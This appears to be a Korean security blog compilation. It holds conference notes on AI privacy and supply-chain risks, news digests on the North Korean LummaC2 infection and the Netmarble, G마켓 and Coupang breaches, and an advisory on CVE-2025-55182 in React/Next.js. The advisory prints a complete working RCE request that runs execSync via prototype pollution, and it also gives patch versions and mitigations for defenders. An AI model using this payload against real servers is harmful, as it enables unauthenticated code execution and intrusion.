1. AI시대 한국 프라이버시 보호 및 보안 생태계의 과제와 제안

- 통신(25.04 SKT), 금융(25.09 롯데카드), 게임(25.11 넷마블), 전자상거래/유통(25.11 쿠팡) 등 사회 전 분야에 걸친 유출
- AI는 과거 단순 데이터 수집/분석 도구로써 전문성이 요구되던 환경에서 누구나 접근 가능하며 다양한 영역에서 사용됨

 

- 주요 이슈

구분내용
반복적인 대형 유출 사고- 25.08까지 민간기업 개인정보 유출 3,038만 건 (쿠팡 포함 시 6,000만건 이상)
> 기업의 개인정보 보호 수준을 신뢰하지 않는다는 응답 67.1%
> 사고 이후 사과·포렌식·수사·과징금에 집중되는 구조
규제의 분절화와
AI vs 프라이버시 프라임
- AI 혁신과 프라이버시 보호를 '제로섬'으로 보는 인식, 정부 부처간 시각·우선순위 충돌
> 법학·산업계 : AI기본법·AI이용자보호·기존 개인정보보호법이 중복·과잉 규제가 되어 규제 완화보다는 정밀 설계 및 혁신과 규제가 충돌하지 않게 설계될 필요성 요구
> AI기본법·AI이용자보호·개인정보보호법·신용정보법까지 모두 적용되면 AI 4중 규제체계이용자 보호와 산업·혁신 부처간 규제 범위 논쟁
> 스타트업·중소기업 : 법 해석, 컴플라이언스 비용 부담 증
데이터 흐름 중심,
환경 고려 제한적
- 개인정보보호법, 목적 명시·개별 동의 중심 구조에 최적화
> 초기 목적을 넘는 2차 활용 요건 엄격
> 서비스 운영 중 쌓인 데이터를 AI 학습 활용 구조적 제약·한계

- LLM·생성형 AI는 공개 데이터, 로그, 메타데이터 등 대규모 비정형 데이터 필요
> 로그·프롬프트·메타데이터 같은 부수적으로 발생한 개인정보까지 학습에 사용 희망
> 현행법에는 이를 뒷받침하는 명확한 법적 근거·가이드가 부족해 회색지대 발생

- AI 학습 목적에 대한 별도 근거·옵트아웃·투명성 규정 필
기업 규모별 격차,
예산 감소
- 대기업·빅테크 vs 중견·중소기업 간 보안 예산·전문 인력 격차
> 250인 이상 기업의 정보보호 정책 보유율 98.7%, 조직 보유율 78.0%
> 10~49인 기업의 정보보호 정책 보유율 48.9%, 조직 보유율 26.2%

- AI·보안·법제를 아우르는 복합 역량 인력 부족
- 실제 공격자는 가장 약한 고리(하청·벤더·중소기업 등)를 공격
> 지난 6년간 침해사고 7,000여 건 중 82%가 중소기업에서 발생

- 중소기업 보안 컨설팅·솔루션 지원 예산 지속 감소
> 22년 173억, 24년 약 89억, 25년 약 57억 원으로 지속 감소

 

- 개인정보보호위원회, AI 혁신 지원 정책 방향
① 규제 불확실성 해소를 위한 사전적정성 검토제 도입
규제샌드박스를 통한 先허용·後제도개선 추진
③ 위원장 직속 원스톱 창구 운영
가명정보 제도·운영 혁신

 

- 제안

구분설명
정보보호 R&D 강화- 현재 적용·활용하고, 미래를 준비하는 역량 마련
- 침해사고 탐지·대응 역량을 핵심 KPI로 설정
> 경영진·보안조직 KPI에 MTTD/MTTR(탐지·복구 평균 시간) 포함 및 분기별 리포트 리뷰

- 정기적 모의침해사고 훈련 및 시나리오 기반 대응 체계 구축
> 연 1회 이상 전사 단위 Red/Blue Team 훈련 실시 및 훈련 결과 기반 Playbook 업데이트

- Privacy by Design 채택 및 확산·기술/서비스 지속 개발
> 설계 단계에서부터 데이터 최소화, 가명·익명 처리 및 머신 언러닝 등 모델 수준 보호 기법 도입

- 취약점 신고포상(Bug Bounty) 제도 지속 개선 및 확산
- 복구·보상 프토콜과 커뮤니케이션 플랜 설계
> 서비스별 BCP/DR/보상 기준 사전 정의, 모의 사고 시뮬레이션을 통한 실행 가능성 점검
통합 거버넌스,
위험 기반 정책
- AI 비즈니스 모델과 서비스 시스템 등 고려한 위험 관리
- 규제·진흥 부처 간 상시 협의체를 통해 일관된 정책 방향 제시
> 관계 부처가 공동 기준·공동 메시지를 내도록 상시 협의 체계 실시
> 기업에 정부기관 단일 창구와 예측 가능한 정책 환경 제공

- 범정부 통합 컨트롤타워 구축
> 개인정보·AI·산업 규제를 한 축에서 조정해 중복 규제·사각지대 최소화
> 사고·정책 책임 주체를 명확히 하는 거버넌스 수립
경영진의 관심, 역할
(책임성, 투명성 강화)
- 프라이버시·AI 리스크 : 이사회·경영진 수준에서 Business Risk로 고려
> 이사회 위험관리위원회·ESG 보고
> 프라이버시·AI 리스크를 재부·법률 리스크와 더불어 상시 관리·감독

- 고영향·고위험 AI 서비스의 데이터·로그·결정 과정 기록 의무화
> 사고 발생 시 누가 어떤 데이터로 어떤 결정을 내렸는지 추적 지원, 최소 로그와 근거 데이터 보존

- 이용자에게 AI 개입 여부, 주요 판단 기준·위험에 대한 기본 설명 제공
> 화면·약관을 통해 AI가 개입·활용 중임을 명확히 알림
> 주요 판단 기분·적용 범위·잠재 위험을 이해하기 쉽게 안내

- 집단소송·징벌적 손해배상 등 실효적 책임성 강
인적 자원- 중소기업·기관 대상 보안·프라이버시 SaaS·컨성팅 바우처 및 공용 플랫폼 제공
> 기본 방화벽·백업·모니터링·ISMS 준비 컨설팅 등 제공, 중소기업의 보안 수준을 일괄 향상

- 프라이버시 테크·보안 스타트업 육성
> 익명화·가명처리·DLP·모델 모니터링 등 특화 솔루션 육성
> 일부 기관·기업을 테스트베드로 활용, 국내 프라이버시 기술 시업 생태계 조성

- AI, 보안, 법제를 아우르는 융합 교육과정 및 직무별 맞춤 교육 확대
> 개발자·기획자·법무·경영진 대상
> AI 기술·보안 아키텍처·규제 요구사항을 함께 다루는 직무별 커리큘럼 운용

- 규제 샌드박스 활용 : 고위험 시나리오를 통제된 환경에서 사전 실험 강화
> 고영향·고위험 AI 서비스를 한정된 데이터·기간·이용자 범위 안에서 시험적용
> 규제·기술 기준 정교
신뢰 및 경쟁력 확보- AI와 프라이버시는 동반 조건
> 신뢰받는 AI를 위해서는 성능뿐 아니라 프라이버시 보호가 함께 충족돼야 하는 필수 요건 인식

- 데이터·AI 서비스는 이용자 신뢰가 떨어지면 성장 자체가 멈추는 핵심 기반 시설
- 규제·기술 표준·비즈니스 모델·인재 양성이 같은 목표로 향하는 거버넌스와 협력 구조 구축
- 개인정보 보호와 데이터 활용이 서로를 제약이 아닌 경쟁력으로 만드는 국가 전략 지

2. 생성형 AI 시대의 공급망 보안 리스크

- 전통적 SW 공급망은 디지털 제품의 생성·개발·배포·생산 및 유통에 사용되는 모든 요소를 의미
> SW 또는 펌웨어 구성요소, 소프트웨어 라이브러리, 사람, 프로세스 및 기술을 포함
> Open Source의 사용이 늘어남에 따라 의존성의 복잡도 지속 증가
> 의존성 추적(SW 개발을 위해 어떤 SW를 사용했는지 모니터링) 및 SBOM(SW 구성요소 명세서) 필요

 

- 보안 리스크 및 추천 관행

구분내용추천 관행
취약 코드 생성- 대규모 정적 데이터를 기반으로 학습
> 오래된 보안 패턴이나 취약한 코드를 학습단계에 사용
> 입력 유효성 검사, 접근 통제 로직 등을 누락 또는 잘못할 가능성
> 정상적으로 보이나 치명적인 취약점을 가진 불안전한 코드 생성 가능성 존재
- 프롬프트 단계에서 보안 요구 명시
- SAST·SCA 도구로 AI 생성 코드 스캔
- 보안 강화 전용 모델/프롬프트 사용
> 별도의 보안 점검용 프롬프
오염(Poisoning)- 공격자가 조작한 데이터가 학습 데이터에 포함
> 악성코드를 포함한 코드를 생성할 가능성 존재
> 조작된 사실 외 다른 모든 기능은 정상적으로 작동 (은밀성)
> LLM 빌더가 오염된 모델을 다운로드 및 서비스에 통합할 경우 공급망 침해 발생
> 현재 AI 모델의 출처, 학습 데이터, 수정 이력 등을 신뢰할 수 있게 추적할 방법이 없음
- 모델 공급망 관리
> 공식 벤더, 검증된 레지스트리에서만 모델 사용
> 서명·해시 관리 및 변경 시 자동 알림

- AIBOM(모델·데이터·파인튜닝 이력 명세) 관리
> 기반 모델, 파인튜닝 기반 데이터 기록 및 배포 시 함께 보관

- 사전·정기 평가
라이선스 문제- 라이선스와 관계없이 모든 코드를 학습단계에서 사용
> 라이선스가 적용된 코드의 구조나 내용을 생성하는 경우가 발생
> 해당 라이선스 조건을 따라야 하는 법적 의무 발생
- 사용 정책 결정
> 구조·아이디어만 참고하여 재작성

- 코드베이스 라이선스 스캔 의무화
> SCA 활용 정기적 스캔 및 자동 알림

- 프롬프트 제약
> 라이선스 제약 미리 명령
라이브러리 의존성- 정상 작동하던 라이브러리를 학습단계에 사용
> 추후 해당 라이브러리에서 취약점, 악성코드 등이 발견되어도 이미 학습이 완료되어 해당 라이브러리를 사용하는 코드 생성
- 취약점 DB 교차 검증
> osv.dev, NVD, KEV 등 확인

- 프롬프트에 보안 요구사항 명시
- 내부 승인 라이브러리 리스트
> 허용된 라이브러리 및 버전 목록을 카탈로그로 관리
> 해당 리스트 내 선택하도록 강제
미존재 라이브러리- Hallucination : 생성형 AI가 사실이 아닌 내용을 그럴듯하게 만들어 내는 오류
> 존재하지 않는 API, 함수 등을 만들어냄

- Slopsqatting 공격
> AI가 존재하지 않는 SW 또는 더 이상 사용하지 않는 패키지 이름을 환각하여 만들어내는 현상을 악용
> 공격자는 그럴듯한 패키지 이름을 생성하고, 해당 이름으로 실제 악성 패키지를 만들어 배포
> AI 코딩 보조 도구가 이러한 패키지를 자동으로 설치할 경우 악성코드에 감염
- 설치 전 레지스트리 검색
> 존재 여부와 신뢰도 확인

- 사내 프록시 레지스트리 사용
> 내부 레지스트리를 통해서만 외부 패키지 설치 허용
> 최초 사용 패키지는 보안팀 승인을 받도록 정책 적용

3. 체대 보안으로서 Physical AI 보안 동향 및 발전방향

- Physical AI : 인공지능 시스템이 물리적 실체를 가지고 실제 환경과 상호작용하고 인간의 육체적인 노동을 대체
> 기존 로봇이 정해진 규칙에 따라 움직이는 것과 달리 데이터 학습을 통해 스스로 판단하여 움직일 수 있는 지능형 존재
> AI 자율성 확대는 보안/프라이버시 위협의 확장을 의미하며, AI에 내장된 보안(Guardrail)이 필요

 

- Physical AI는 클라우드가 아닌 온디바이스(Edge)에서 실시간으로 작동
> 프라이버시 보호, 네트워크 불안정 지역에서 안전한 운영, 로컬 보안 정책 반영 가능

구분설명
SafeACT- Safety Action Control Technology
> AI의 판단·행동·결과 루프에 안전 계층 삽입
> 센서·모델 액션 간 실시간 제어
> 비정상 행동 감지 시 자동 중단 및 리커버리 모드
SecureLoop- 입력부터 출력까지 데이터 흐름 전체를 암호화/감사 추적
- AI 모델의 입력갑과 응답 로그를 지역 단위에서 분리 저장 (Local Audit)
- 개인정보 노출 위험을 최소화하고, 모델 탈취 공격 방어

4. 안전한 AI 데이터 활용을 위한 AI프라이버시 리스크 관리 방안

- 인공지능의 발전은 방대한 데이터 처리를 기초로 하고 있어 기존의 개인정보 보호원칙과 상당한 충돌 발생
> 최소수집원칙 : 서로 연관되지 아니한 테이터의 관계를 분석하여 인공지능 서비스 개발 시 최대한의 개인정보 처리 필요
> 목적제한의 원칙 : 개인정보 최초 수집 시 인공지능의 개발 목적을 미리 구체적으로 예정하기 어려움
> 이용제한의 원칙 : 적절한 인공지능을 학습시킬 수 있는 데이터가 부족하며, 인공지능 정확성 검증에도 적합하지 않음

 

- AI 사업자 조사 동향-사전 실태점검 결과 발표

구분설명
AI 개발·학습- 공개된 데이터와 이용자가 프롬프트에 입력한 내용을 AI 개발·학습에 이용
> 프롬프트 입력 내용 활용에 대해 이용자가 거부할 수 있는 기능이 없음으로 확인
> 개보위는 강화된 개인정보 보호조치 방안을 준수하도록 개선권고
① 사전학습시 주민등록번호 등 개인정보 포함 URL을 학습데이터에서 제외할 것
② 이용자 입력 데이터 사용 목적을 분명히 알리고 사용 여부 선택권 보장할 것
③ AI 관련 개인정보 처리 흐름 전반을 구체적으로 안내할 것

※ 딥시크는 점검 중 이용자가 프롬프트 입력 내용의 AI 개발·학습 활용을 거부할 수 있는 Opt-Out 기능 마련
국외 이전- 이용자가 AI 프롬프트에 입력한 내용을 국외 소재 사업자로 전송하는 것으로 확인
> 개보위는 국외 이전의 적법 근거를 마련하고, 이미 국외로 이전된 이용자의 프롬프트 입력 내용을 즉각 파기할 것을 시정권고

※ A사는 점검 중 이용자 입력의 국외 이전은 불필요하다는 개보위 지적에따라 신규 이전 차단

 

- 생성형 인공지능(AI) 개발·활용을 위한 개인정보 처리 안내서
> 생성형 인공지능 개발 및 활용의 4단계

단계설명
목적 설정- 사용 맥락, 대상 및 기술적 한계 등을 고려해 생성형 AI를 통해 성취하고자 하는 구체적 목적 설정
> 생성형 AI 활용 목적 설정 및 관련된 개인정보 적법처리 근거 확보

① 공개된 개인정보 수집·이용하는 경우
- 개보법 상 정당한 이익 조항(제15조 제1항 제6호)이 수집·이용의 실질적인 적법 근거가 될 수 있음
- 단, 목적의 정당성, 공개된 개인정보 처리의 필요성, 기술적·관리적 안전조치 및 정보주체 권리보장 방안 마련 등 정보주체의 권리침해 가능성 최소화가 핵심적으로 요구

② 이용자 개인정보를 재사용하여 AI를 학습·개발하는 경우
- 적법처리 근거는 AI 학습·개발이 당초 개인정보 수집 목적과 관련되어 있는지 및 개인정보의 성격에 따라 달라질 수 있음
전략 수립- 정보통신기술 역량 및 여건에 대한 진단을 통해 AI 개발 및 활용의 구체적 방식 결정 및 리스크 관리 방안 등 핵심 전략 수립
> 안내서는 개발·활용 방식에 따라 3가지 유형으로 구분
① 비공개 모델 등 사용 AI 서비스를 API에 연계하는 방법으로 활용하는 서비스형 LLM
② 주로 공개된 사전학습된 모델을 추가 학습하여 개발하는 기성 LLM 활용
③ 모델을 처음부터 직접 사전 학습하는 방식인 자체 개발

※ 사용하는 LLM 서버가 해외에 소재하는 경우, 개인정보 국외 이전에 해당하는지 검토 필요
AI 학습 및 개발- 설정한 목적 달성을 위해 데이터 (추가)학습 및 모델 미세조정
> 데이터 오염 방지 목적의 출처 검증, 전처리, 가명·익명 처리
> AI 모델에 대한 미세조정, 정렬 등 안전장치 추가
> AI 시스템 접근권한 통제, 입출력 필터링 적용
시스템 적용 및 관리- 실제 서비스 서비스 환경에 적용 및 시스템 성능·안전성을 유지하며 정보주체 권리 침해 방지
> 사전 테스트 통해 프라이버시 리스크를 점검 및 문서화
> 허용되는 이용방침 작성 및 공개
> 개인정보 침해 신고 기능 및 정보주체 권리 보장 방안 마련

 

- 합성데이터 및 영상데이터

구분설명
합성데이터- 컴퓨터 시뮬레이션 또는 알고리즘에 원본데이터의 형식과 구조 및 통계적 분포 특성과 패턴을 학습하여 생성한 모의 또는 가상 데이터
> 가상의 데이터로 민감정보를 외부에 직접적으로 노출하지 않아 개인정보 문제 해결
> 익명성이 인정될 경우 개보법 제58조의2에 따라 개보법상 규제 적용이 배제

- 개인정보에 적용되는 여러 규제의 적용을 회피 또는 완화할 수 있어 가치 있는 학습데이터 세트 대량 구축 가
영상데이터- AI 학슴 또는 기술개발 등의 과학적 연구를 목적으로 이용 또는 제3자에게 제공하는 경우
> 특정 개인을 알아볼 수 없도록 해당 개인영상정보를 가명처리
> 가명정보와 결합 가능한 추가 정보 별도 분리 보관·관리

- 규제샌드박스 : 영상데이터 원본 활용
> 가명처리된 영상데이터를 AI 등의 연구개발에 활용할 경우, 보행자 인식률 저하 등으로 경쟁력 확보 어려움
> 보다 강화된 안전조치 기준을 마련하고 규제샌드박스 실증특례 제도를 통해 영상데이터 원본 활용

 

- 개보위 혁신 지원 원스톱 서비스
> 현장 애로사항을 보다 빠르고 안전하게 실질적인 해결 방안을 제공하는 기구
규제샌드박스 : 법령상 규정이 없거나 불분명한 경우 일정요건 하에 허용
사전적정성 : 개보위 의결을 통해 일정요건 하에 사후규제 면제
이노베이션존 : 개보위가 지정한 안전한 환경에서 유연하게 가명정보 활용 가능
법령적극해석 : 법 해석상 모호한 경우 개보위의 적극 해석 의결을 통해 결과 통보

5. 생성형 AI와 개인정보 유출 대응 체계

- AI 발전 과정에서 대규모 데이터 처리는 필수로, 신사업 육성과 개인 정보 침해 위험 문제가 양립
- 개인정보보호 대응 체계
> 보호 대상이 되는 개인정보 식별 및 위험도 산출
> 개인정보 Life Cycle을 설계단계부터 반영
> 개인정보 보유 최소화권한 최소화, 비식별화
> 개인정보 처리업무 시스템화, 신규 서비스 보안성 심의

 

- 기업 : AI 자산에 대한 보안자산 등록/관리
- 정부 : 사전 보안 적정성검토 제도 등 정책 지원+가이드 (Security By Design)
- 서비스 제공사 : 보안 요구사항을 반영하여 서비스 제

'대외활동' 카테고리의 다른 글

K-CTI 2025  (0) 2025.04.16
ISDP 2025  (0) 2025.02.18
PASCON 2024  (2) 2024.09.11
코리아 핀테크 위크 2024  (5) 2024.09.01
제13회 정보보호의 날 기념식  (1) 2024.07.11
요약 - 북한 연계 해킹 조직의 개발자 장비가 LummaC2 인포스틸러에 감염
- 내부 인프라와 운영 방식, 자격증명이 노출
내용 - 북한 국가연계 위협조직 소속 개발자의 장비가 루마C2(LummaC2) 인포스틸러 감염
내부 인프라와 운영 방식이 고스란히 드러나는 사건이 발생

- 현지시간 4일, 허드슨락과 사일런트푸시의 교차 분석 결과
> 해당 기기는 올해 2월 발생한 바이비트 거래소 해킹(피해액 14억달러)에 이용된 사실이 확인
> 해당 장비는 단순 공격자가 아니라 전문 개발 환경을 운영하는 고급 장비
> 특히 감염된 장비에서 발견된 이메일(trevorgreer9312[@]gmail.com)은 해킹 직전 개설된 bybit-assessment[.]com 도메인 등록에 쓰임 (바이비트를 사칭한 피싱 사이트 구축에 활용된 것으로 분석)
※ 허드슨락 : 사이버 범죄 정보 기업 
※ 사일런트푸시 : 위협 인텔리전스 기업 

- 감염 로그 분석 결과
> 아스트릴 VPN을 통해 미국 IP를 경유했으며 브라우저 기본 언어는 중국어, 번역 기록은 한국어

- 기기에는 해커간 내부 통신·명령제어를 주고받을 수 있도록 슬랙, 텔레그램, 드롭박스 등이 설치
> 특히 드롭박스 구조 분석 결과 탈취 정보 업로드 흔적도 다수 발견

- 국가급 해킹 조직 내 운영보안(OPSEC) 실패의 대표적 사례
> 향후 북한의 사이버 작전 방식 분석에 중대한 단서가 될 것
기타 - 북한 해커가 인포스틸러에 감염된 것은 처음이지만, 내부 자료가 외부로 유출된 사례는 과거에도 존재
> 올해 8월에는 해커들이 북한 또는 중국 추정 해커의 컴퓨터에서 9GB 분량의 내부 데이터를 유출한 바 있음

 

보안뉴스

 

“북한 해커가 역으로 털렸다” 바이비트 14억달러 해킹 연루 정황 드러나

북한 국가연계 위협조직 소속 개발자의 장비가 루마C2(LummaC2) 인포스틸러에 감염되면서 내부 인프라와 운영 방식이 고스란히 드러나는 사건이 발생했다.

www.boannews.com

 

Exclusive Look Inside a Compromised North Korean APT Machine Linked to The Biggest Heist in History

Recently, Hudson Rock analyzed a unique infection from a LummaC2 infostealer log. The victim wasn't a corporate employee or an unsuspecting consumer. The victim was a high-level threat actor operating a sophisticated malware development rig.

www.infostealers.com

 

Silent Push Pivots into New Lazarus Group Infrastructure, Acquires Sensitive Intel Related to $1.4B ByBit Hack and Past Attacks

Silent Push pivoted into new Lazarus Group infrastructure, acquiring sensitive intel related to $1.4B ByBit hack and past attacks.

www.silentpush.com

 

요약 - 넷마블, 11월 발생한 외부 해킹으로 최소 611만 명의 고객 정보 유출 확인
- G마켓, 지난달 29일 일부 계정이 도용돼 모바일상품권 부정 결제 발생
내용 - 넷마블, 11월 발생한 외부 해킹으로 최소 611만 명의 고객 개인정보 유출 공식 확인
> 휴면 계정 포함 약 3,100만 개의 ID와 암호화된 비밀번호도 외부로 유출
> 고객센터 문의자, 입사지원자 등의 정보 약 8천여 건이 더 유출된 정황도 밝혀짐
> 유출된 비밀번호가 암호화된 상태이며, 주민등록번호 등 민감한 고유식별정보는 저장돼 있지 않았다고 설명
> 모바일 게임이나 런처 기반 게임은 이번 유출 사태와 관련 없음

- 이름·생년월일·비밀번호 해시 등은 피싱, 계정 탈취, 스미싱 등의 2차 범죄로 악용될 수 있음

- 넷마블은 “조사 결과에 따라 유출 범위가 늘어날 가능성도 있다”고 밝힘

- 보안 업계에서는 다음과 같은 구조적 취약이 복합적으로 작용했을 가능성을 지적
> 수년간 운영된 레거시 시스템 및 API가 남아 있었고, 충분한 보안 점검이나 폐기가 이뤄지지 않았다는 점
> 휴면 계정, 외주·협력사 계정, 과거 제휴사 계정 등 관리 대상이 방대
계정 정리와 권한 회수가 체계적으로 이뤄지지 않았다는 점 등

> 또 실시간 모니터링과 이상행위 탐지 체계(데이터 접근 모니터링, 행위 기반 탐지 등)가 부재했을 가능성
> 넷마블은 해킹을 인지한 후 규정상 신고 기한을 3일 벗어난 시점에 신고했다는 지적

- 개인정보보호위원회와 과기정통부는 넷마블 시스템 전반에 대해 기술적·관리적 보호 조치 준수 여부 점검
> 경찰청은 해킹 방식과 유출 경로, 유출된 정보의 거래 여부 등을 포함해 형사 수사 시작

- 이번 사건을 계기로 게임업계 전반에 걸친 보안 체계 재정비가 필요하다고 강조
> 단순 개발 중심 구조가 아닌, 개인정보를 다루는 기업으로서 금융권 수준의 보안 인력 배치, 권한 관리, 계정 정비, 실시간 데이터 접근 감시, 정기적 보안 감사 등이 필수라는 지적

======================================================================================

- G마켓, 모바일 상품권 도용 결제 사고가 발생해 금융감독원 등 관계당국에 신고
> 지난달 29일, 외부에서 유출된 것으로 추정되는 일부 계정의 아이디와 비밀번호가 도용돼 모바일상품권 부정 결제가 발생
> 공격자가 무단으로 다른 사람의 G마켓 계정에 로그인해, 사전 등록돼 있던 카드로 상품권을 결제한 것으로 추정

- G마켓은 미결제 사용분 관련 문의가 급증하자 자체 보안 단계를 상향 조정
> 조치 직후부터 추가 피해는 더 이상 발생하지 않음
> 금융감독원 신고 및 결제 피해가 의심되는 고객 대상 연락을 취해 상황 안내 및 확인 절차 진행
> 비밀번호 변경 권고, 2단계 인증 확대 등 추가 보안 대책을 마련해 시행
기타 - 넷마블 정보유출 사태
> 단순한 해킹 사건을 넘어, 레거시 시스템의 방치, 부족한 계정 관리, 부실한 보안 운영 체계, 느슨한 대응 체계 등 복합적 보안 관리 실패가 누적된 결과로 보임

 

보안뉴스

 

넷마블 해킹 사태, “611만명 개인정보와 3,100만 ID” 유출…고객센터 문의·입사지원자 등 8천여

국내 대표 게임사 넷마블이 지난 11월 발생한 외부 해킹으로 인해 최소 611만 명의 고객 개인정보가 유출된 것이 공식 확인됐다. 여기에 더해, 휴면 계정 포함

www.dailysecu.com

 

"쿠팡이어 G마켓도"…모바일 상품권 도용 결제 사고 발생

외부에서 유출된 것으로 추정… "금융 당국 신고" 비밀번호 변경 권고, 2단계 인증 확대 등 보안 대책 시행 e커머스 기업 G마켓에서 모바일 상품권 도용 결제 사고가 발생해 금융감독원 등 관계당

www.news1.kr

 

1. React 및 Next.js

- React : 메타에서 개발한 웹사이트 화면을 만드는 데 사용되는 자바스크립트 라이브러리
- Next.js : React를 기반으로 만든 웹 프레임워크

 

1.1 React Server Component (RSC)

- 서버 측에서 컴포넌트를 실행하여 미리 렌더링된 마크업을 생성후, 클라이언트에게 전달되어 사용자에게 콘텐츠를 보여주는 방식

2. 취약점

[사진 1] CVE-2025-55182 [1]

- RSC Flight 프로토콜 처리 과정에서 requireModule()의 부적절한 역직렬화로 인해 인증 없이 서버에서 원격 코드 실행이 가능한 취약점 (CVSS: 10.0) [2]

> 해당 함수에서 hasOwnProperty 같은 검증 없이 클라이언트가 요청한 name을 그대로 사용하여 취약점 발생

※ NIST에서 CVE-2025-66478은 CVE-2025-55182와 동일 취약점으로 중복 처리하여 정보 삭제

 

> 프레임워크는 기본적으로 RSC 구현을 내장하므로, 함수를 직접적으로 명시하지 않더라도 공격에 노출됨

> 현재 중국에서 해당 취약점을 활용한 공격 테스트가 시작된 정황이 포착 되었으며, 대상 서버에 페이로드 업로드 등 5가지 단계까지 완료한 상태로 확인

※ 대상 서버에 페이로드 업로드, RSC 직렬화 취약점 유발, 외부 DNSLog로 명령 실행 성공 여부 확인, 서버 측에서 child_process 실행 가능성 검증

 

> 39%의 클라우드 인스턴스가 취약하며, 국내의 경우 18만 9천 대 노출된 것으로 확인

[사진 2] (app="NEXT.js" ❘❘ app="React.js") && country="KR” 검색 결과 [3]

- PoC [4][5][6]

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 578

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('open -a Calculator');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
[영상 1] 취약점 시연 영상 [7]

- 대응방안

> 벤더사 제공 업데이트 적용  [8][9][10]

취약점 제품명 영향받는 버전 해결 버전
CVE-2025-55182 react-server-dom-webpack 19.0 19.0.1
19.1.0 ~ 19.1.1 19.1.2
19.2.0 19.2.1
react-server-dom-parcel 19.0 19.0.1
19.1.0 ~ 19.1.1 19.1.2
19.2.0 19.2.1
react-server-dom-turbopack 19.0 19.0.1
19.1.0 ~ 19.1.1 19.1.2
19.2.0 19.2.1
Next.js 14.3.0-canary.77 이상 최신 안정 버전으로 다운그레이드 권고
(14.x)
15.0.x 15.0.5
15.1.x 15.1.9
15.2.x 15.2.6
15.3.x 15.3.6
15.4.x 15.4.8
15.5.x 15.5.7
16.0.x 16.0.7

 

> 취약점 스캐너를 활용한 취약 여부 확인 및 탐지 정책 적용 [11][12]
> 로그 점검 (RSC 관련 엔드포인트에 대한 반복적인 요청 등)

3. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-55182
[2] https://www.aikido.dev/blog/react-nextjs-cve-2025-55182-rce
[3] https://en.fofa.info/result?qbase64=KGFwcD0iTkVYVC5qcyIgfHwgYXBwPSJSZWFjdC5qcyIpICYmIGNvdW50cnk9IktSIg%3D%3D
[4] https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
[5] https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478?tab=readme-ov-file#payload-that-can-see-command-execution-result-in-response-body-most-useful
[6] https://github.com/ejpir/CVE-2025-55182-research
[7] https://x.com/maple3142/status/1996687157789155647?s=20
[8] https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components#immediate-action-required
[9] https://nextjs.org/blog/CVE-2025-66478
[10] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&pageIndex=1&nttId=71912&menuNo=205020
[11] https://github.com/assetnote/react2shell-scanner
[12] https://www.piolink.com/kr/service/Security-Analysis.php?vType=view&bbsCode=security&idx=178
[13] https://www.boannews.com/media/view.asp?idx=140766&page=1&kind=1
[14] https://www.dailysecu.com/news/articleView.html?idxno=203063
[15] https://www.dailysecu.com/news/articleView.html?idxno=203111

요약 - 쿠팡, 사실상 이용자 대부분에 해당하는 3,370만개의 계정에서 개인정보 노출 사고 발생
- 올해 6월 말부터 약 5개월간 해외 서버를 통한 무단 접근하여 정보 탈취
내용 - 11.20 쿠팡, 고객 4,500여명의 개인정보 노출 사고 발생
> 고객 개인정보가 비인가 조회된 것으로 확인
> 과학기술정보통신부와 한국인터넷진흥원, 개인정보보호위원회에 신고
> 노출된 정보는 이름, 이메일 주소, 배송지 주소록(전화번호·주소), 최근 5건의 주문 정보
> 결제 정보나 신용카드 번호, 로그인 정보(비밀번호 등)는 별도 시스템에 격리돼 관리되므로 이번 유출 대상에 포함되지 않음
> 해당 활동을 탐지한 뒤 제3자가 사용했던 접근 경로 차단 및 모니터링 강화
> 지금까지 조회한 정보를 이용한 사례는 확인되지 않음
> 쿠팡을 사칭하는 전화와 문자 등에 각별한 주의 당부

- 11.29 쿠팡, 고객 개인 정보 노출 계정이 3,370만개 가량으로 확인되었다고 발표 (초기 발표의 7,500배)
> 활성 고객 수는 2,470만명으로, 사실상 모든 고객의 정보 노출
> 해외 서버를 통해 올해 06.24부터 무단으로 개인정보에 접근한 것으로 추정되며, 이 경로는 현재 차단됨
※ 무단 접근은 6월말부터 시작됐음에도 불구하고, 약 5개월이 지난 뒤인 11.18에야 처음으로 내부 침해 사실 인지 (장기간 유출 상황이 지속됐다는 것은 심각한 내부 감시‧보안 통제 실패를 의미)

- 정부, 이번 사안의 심각성을 고려해 민관합동조사단 구성·운영
> 11.30 민관합동조사단을 구성하고, 사고 원인 분석 및 재발방지 대책을 마련할 계획
> 개인정보위는 쿠팡으로부터 2차례에 걸쳐 유출 신고를 접수받아 11.21부터 조사 진행 중
> 국민 다수의 연락처, 주소 등이 포함되어 있어 신속한 조사를 거쳐 보호법상 안전조치의무 위반시 엄정 제재할 방침
> 과기정통부와 개인정보위는 2차 피해를 방지하기 위해 대국민 보안 공지 진행

- 이번 사고는 내부자 소행에 무게가 실리고 있으며, 인증이나 접근권한 관리쪽 문제였을 가능성 제기
> 서울경찰청 사이버수사대는 중국 국적 내부 직원 소행에 무게를 두고 수사에 착수
> 쿠팡은 지난 25일 수사대에 고소장 제출(고소장에 피고소인을 ‘성명불상자’로 기재)
> 지목된 내부자는 이미 쿠팡을 퇴사하고 중국에 거주 중인 것으로 알려짐

- 정부, 30일부터 3개월간을 ‘인터넷상(다크웹 포함) 개인정보 유노출 및 불법유통 모니터링 강화 기간’으로 지정

